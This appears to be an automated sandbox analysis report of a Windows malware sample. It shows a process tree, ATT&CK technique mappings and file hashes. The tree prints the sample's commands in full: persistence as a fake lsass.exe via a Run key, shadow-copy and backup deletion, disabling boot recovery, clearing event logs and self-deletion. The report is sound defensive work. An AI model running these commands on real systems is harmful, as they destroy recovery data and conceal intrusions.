PID 540 wrote to memory of 684	540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe	34
PID 540 wrote to memory of 684	540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe	34
PID 540 wrote to memory of 684	540	97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe	34
PID 684 wrote to memory of 1700	684	cmd.exe	36
PID 684 wrote to memory of 1700	684	cmd.exe	36
PID 684 wrote to memory of 1700	684	cmd.exe	36
PID 684 wrote to memory of 1700	684	cmd.exe	36
PID 1552 wrote to memory of 612	1552	lsass.exe	38
PID 1552 wrote to memory of 612	1552	lsass.exe	38
PID 1552 wrote to memory of 612	1552	lsass.exe	38
PID 1552 wrote to memory of 612	1552	lsass.exe	38
PID 1552 wrote to memory of 608	1552	lsass.exe	40
PID 1552 wrote to memory of 608	1552	lsass.exe	40
PID 1552 wrote to memory of 608	1552	lsass.exe	40
PID 1552 wrote to memory of 608	1552	lsass.exe	40
PID 1552 wrote to memory of 1612	1552	lsass.exe	42
PID 1552 wrote to memory of 1612	1552	lsass.exe	42
PID 1552 wrote to memory of 1612	1552	lsass.exe	42
PID 1552 wrote to memory of 1612	1552	lsass.exe	42
PID 1552 wrote to memory of 316	1552	lsass.exe	44
PID 1552 wrote to memory of 316	1552	lsass.exe	44
PID 1552 wrote to memory of 316	1552	lsass.exe	44
PID 1552 wrote to memory of 316	1552	lsass.exe	44
PID 1552 wrote to memory of 1492	1552	lsass.exe	46
PID 1552 wrote to memory of 1492	1552	lsass.exe	46
PID 1552 wrote to memory of 1492	1552	lsass.exe	46
PID 1552 wrote to memory of 1492	1552	lsass.exe	46
PID 1552 wrote to memory of 852	1552	lsass.exe	48
PID 1552 wrote to memory of 852	1552	lsass.exe	48
PID 1552 wrote to memory of 852	1552	lsass.exe	48
PID 1552 wrote to memory of 852	1552	lsass.exe	48
PID 1552 wrote to memory of 1576	1552	lsass.exe	50
PID 1552 wrote to memory of 1576	1552	lsass.exe	50
PID 1552 wrote to memory of 1576	1552	lsass.exe	50
PID 1552 wrote to memory of 1576	1552	lsass.exe	50
PID 1576 wrote to memory of 636	1576	cmd.exe	52
PID 1576 wrote to memory of 636	1576	cmd.exe	52
PID 1576 wrote to memory of 636	1576	cmd.exe	52
PID 1576 wrote to memory of 636	1576	cmd.exe	52
PID 1552 wrote to memory of 524	1552	lsass.exe	55
PID 1552 wrote to memory of 524	1552	lsass.exe	55
PID 1552 wrote to memory of 524	1552	lsass.exe	55
PID 1552 wrote to memory of 524	1552	lsass.exe	55
PID 524 wrote to memory of 868	524	cmd.exe	57
PID 524 wrote to memory of 868	524	cmd.exe	57
PID 524 wrote to memory of 868	524	cmd.exe	57
PID 524 wrote to memory of 868	524	cmd.exe	57
PID 1552 wrote to memory of 1700	1552	lsass.exe	58
PID 1552 wrote to memory of 1700	1552	lsass.exe	58
PID 1552 wrote to memory of 1700	1552	lsass.exe	58
PID 1552 wrote to memory of 1700	1552	lsass.exe	58

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1612	attrib.exe

C:\Users\Admin\AppData\Local\Temp\97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe
"C:\Users\Admin\AppData\Local\Temp\97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:540
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /e:on /c md "C:\Users\Admin\AppData\Roaming\Microsoft\Windows" & copy "C:\Users\Admin\AppData\Local\Temp\97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" & reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe\" -start"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1468
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe\" -start"
    3⤵
    - Adds Run key to start application
    PID:1496
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -start
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:612
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    PID:608
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup
    3⤵
    PID:316
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup -keepversions:0
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete backup
    3⤵
    PID:852
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1576
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:636
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:524
  - - C:\Windows\SysWOW64\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:868
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
    3⤵
    PID:1700
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
      4⤵
      PID:1448
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
    3⤵
    PID:1428
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
      4⤵
      PID:804
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
    3⤵
    PID:548
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
      4⤵
      PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C attrib "%userprofile%\documents\Default.rdp" -s -h
    3⤵
    PID:300
  - - C:\Windows\SysWOW64\attrib.exe
      attrib "C:\Users\Admin\documents\Default.rdp" -s -h
      4⤵
      Views/modifies file attributes
      PID:1612
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C del "%userprofile%\documents\Default.rdp"
    3⤵
    PID:1064
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Application
    3⤵
    PID:2044
  - - C:\Windows\SysWOW64\wevtutil.exe
      wevtutil.exe clear-log Application
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:1068
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Security
    3⤵
    PID:1008
  - - C:\Windows\SysWOW64\wevtutil.exe
      wevtutil.exe clear-log Security
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:436
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log System
    3⤵
    PID:1308
  - - C:\Windows\SysWOW64\wevtutil.exe
      wevtutil.exe clear-log System
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:952
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C sc config eventlog start=disabled
    3⤵
    PID:840
  - - C:\Windows\SysWOW64\sc.exe
      sc config eventlog start=disabled
      4⤵
      Launches sc.exe
      PID:656
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 0
    3⤵
    - Executes dropped EXE
    PID:588
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 1
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:1752
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 2
    3⤵
    - Executes dropped EXE
    PID:1052
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del "C:\Users\Admin\AppData\Local\Temp\97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe" & if not exist "C:\Users\Admin\AppData\Local\Temp\97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433.exe" exit )
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:684
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 3 127.1
    3⤵
    - Runs ping.exe
    PID:1700

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1832

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Hidden Files and Directories

T1158

Indicator Removal on Host

T1070

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

Filesize
2KB

MD5
1699855cd5e006d467193f752c958899

SHA1
11af036e632ecfb1d99c908529663597d2795786

SHA256
bcb990f29d151ab7ea6dc20723f8d065ea534f1320f6c383758ea7831a30a7ea

SHA512
e3f66f158b81426b62bd6aff0da13401acaa7b639686ad8ac589a8f22dfbf6d039d67ccffa2aee482b23176b9d19b7a256808e2d6037584725aadb26e7cf263b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_8AE57F9FAAC778EA4099F469BEEE4C46

Filesize
472B

MD5
f219eb248728be0747ada8ad649b75d8

SHA1
ab0f9fd79995b2328bd4d996e60b0065f5bf30d5

SHA256
a7af1395352b84f79a6ada41b92029bd542d2d8b74bb2713a5aaf49163d47076

SHA512
5ce63a21ef03d583b563df5d03d613562b84068de20a8b1664bcdb73bee42380032d46b49c64210722f29653e25e5deff596b4b7f8f0206996f032bcdcdb36d0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\572BF21E454637C9F000BE1AF9B1E1A9

Filesize
506B

MD5
3f2519a65dd6df8035110d6fc9694868

SHA1
b932411e272bb898b178b1e789c33ca1e61ea5d9

SHA256
e7a8870790b22abcbfac9c155411ca1fa83e1902cc054f52336d1746a7c205e8

SHA512
143064ceb318f1b2e389f53d36899b0597f8e169b5536340bf64f4aa89b5c23b62f28e4bf406f5d5dad23f650560b90cfb9dbc8958c917746b0bb3bd73acda46

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

Filesize
398B

MD5
2134f7d798ae5c40f911c921be136a2f

SHA1
59ff08115d900941d84ff2eaa24b839ca6362229

SHA256
f44cd222eb5f6c99ddf05fdb89b63cac204fc52f7f27765b6fd592339058aa52

SHA512
2a7c051f72e6dbabbd43f5093ff69787b29822130e0f3de3b1f127ebd73769cd89ace42cc3bcaddfe8c4ec820a0eddabac9afa9806ea7afe30a3999055c71775

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_8AE57F9FAAC778EA4099F469BEEE4C46

Filesize
402B

MD5
068f6cfd2a9c6c755c1b8922de13fbe4

SHA1
962d1e3c9392ad148d1b8f4f2363c0e45245c2f3

SHA256
6de86da5873fee78cb05d8a0073192146aae7cb60b38e00b6ce2747354001241

SHA512
838a22e5034fad4570a7dd3e05b3eb5bc7a1d8ec1cc98eea86294d659758c821a6231835e46421b90f5ceb111f253f490bf86ea23bf56e1ae91a6878dd56dc40

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\572BF21E454637C9F000BE1AF9B1E1A9

Filesize
248B

MD5
e3eae94902bcbd268207094310b956d7

SHA1
f7c07445739685e37072b8c5663caa05c9691971

SHA256
de50d9c5401e2ef38f77ffad9957ee51fadd4db071962ec792da4038c99569b0

SHA512
5b428cc33fcd03f290aa3de766f4aad1ec5a22c91f861ebf4124d20be7da2121c8b9052915f41fb38d55539ca403e46486a82149815c296bce2da292e0c249f7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
340B

MD5
513bb7c6691d1b1152231535a803e511

SHA1
4fcca10838f829dae7f1bbbe61b1e7a8724a6081

SHA256
c60662f9be475289ba821e2652fb5299d8d08404dc36a32ed936069c5a6e5c1d

SHA512
86bad681f0dfa439b687b1e258a439c395b3f5d28159ccf2817e90d493854540ca629ca709d9a2945bb1eed4d40c7a7348de1a4430772bda42d0295af2afe483

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\054BCZHL\92J2VHTG.htm

Filesize
184B

MD5
b1cd7c031debba3a5c77b39b6791c1a7

SHA1
e5d91e14e9c685b06f00e550d9e189deb2075f76

SHA256
57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

SHA512
d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RVFTVHJ0\E3B3BQDR.htm

Filesize
18KB

MD5
19cb5295e21160d78213d3ccc33b8f75

SHA1
d70bc890627b2dd33479eff5d2ffc8aff40a534b

SHA256
7810c957fdddcb7e1477957c0b1f6e90cbaf2bec084ede2a9aa5190d131084c8

SHA512
5b437b9055cdb29e0074fe493c2281af5f6bc4697e6f60d22329fa606c09bd4ffe8c0e50f98c2a12233eac00c480bc38ded1d8431ed771a4495955d865607c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe

Filesize
624KB

MD5
e2c9e21bc2d59273ad13144b10e082f8

SHA1
0fd4b5d955122d84552626d2634c62c78e800b7c

SHA256
97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433

SHA512
393ca8e5bf98120a4e0a8b6bab6f4f9582f3283ded401d7942ac8089a9b65d87b63ee66ac43f85de6b08ab914035e08c9b348dbd594688d2a8fee7df08dd7349

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe

Filesize
624KB

MD5
e2c9e21bc2d59273ad13144b10e082f8

SHA1
0fd4b5d955122d84552626d2634c62c78e800b7c

SHA256
97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433

SHA512
393ca8e5bf98120a4e0a8b6bab6f4f9582f3283ded401d7942ac8089a9b65d87b63ee66ac43f85de6b08ab914035e08c9b348dbd594688d2a8fee7df08dd7349

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe

Filesize
624KB

MD5
e2c9e21bc2d59273ad13144b10e082f8

SHA1
0fd4b5d955122d84552626d2634c62c78e800b7c

SHA256
97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433

SHA512
393ca8e5bf98120a4e0a8b6bab6f4f9582f3283ded401d7942ac8089a9b65d87b63ee66ac43f85de6b08ab914035e08c9b348dbd594688d2a8fee7df08dd7349

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe

Filesize
624KB

MD5
e2c9e21bc2d59273ad13144b10e082f8

SHA1
0fd4b5d955122d84552626d2634c62c78e800b7c

SHA256
97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433

SHA512
393ca8e5bf98120a4e0a8b6bab6f4f9582f3283ded401d7942ac8089a9b65d87b63ee66ac43f85de6b08ab914035e08c9b348dbd594688d2a8fee7df08dd7349

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe

Filesize
624KB

MD5
e2c9e21bc2d59273ad13144b10e082f8

SHA1
0fd4b5d955122d84552626d2634c62c78e800b7c

SHA256
97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433

SHA512
393ca8e5bf98120a4e0a8b6bab6f4f9582f3283ded401d7942ac8089a9b65d87b63ee66ac43f85de6b08ab914035e08c9b348dbd594688d2a8fee7df08dd7349

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe

Filesize
624KB

MD5
e2c9e21bc2d59273ad13144b10e082f8

SHA1
0fd4b5d955122d84552626d2634c62c78e800b7c

SHA256
97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433

SHA512
393ca8e5bf98120a4e0a8b6bab6f4f9582f3283ded401d7942ac8089a9b65d87b63ee66ac43f85de6b08ab914035e08c9b348dbd594688d2a8fee7df08dd7349

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe

Filesize
624KB

MD5
e2c9e21bc2d59273ad13144b10e082f8

SHA1
0fd4b5d955122d84552626d2634c62c78e800b7c

SHA256
97f9cd7c0791ecc4a5bd2ed4e79b8966e46cdcdf55287e43abf317ced4792433

SHA512
393ca8e5bf98120a4e0a8b6bab6f4f9582f3283ded401d7942ac8089a9b65d87b63ee66ac43f85de6b08ab914035e08c9b348dbd594688d2a8fee7df08dd7349

Download Submit
memory/540-57-0x0000000000390000-0x00000000003F2000-memory.dmp

Filesize
392KB

Download
memory/540-56-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/540-55-0x00000000758D1000-0x00000000758D3000-memory.dmp

Filesize
8KB

Download
memory/540-66-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/540-54-0x0000000000390000-0x00000000003F2000-memory.dmp

Filesize
392KB

Download
memory/588-121-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/588-120-0x0000000000230000-0x0000000000292000-memory.dmp

Filesize
392KB

Download
memory/588-117-0x0000000000230000-0x0000000000292000-memory.dmp

Filesize
392KB

Download
memory/1052-124-0x00000000002D0000-0x0000000000332000-memory.dmp

Filesize
392KB

Download
memory/1052-123-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1052-118-0x00000000002D0000-0x0000000000332000-memory.dmp

Filesize
392KB

Download
memory/1552-72-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1552-71-0x0000000001CB0000-0x0000000001D12000-memory.dmp

Filesize
392KB

Download
memory/1552-113-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1752-116-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/1752-115-0x00000000002A0000-0x0000000000302000-memory.dmp

Filesize
392KB

Download
memory/1752-125-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads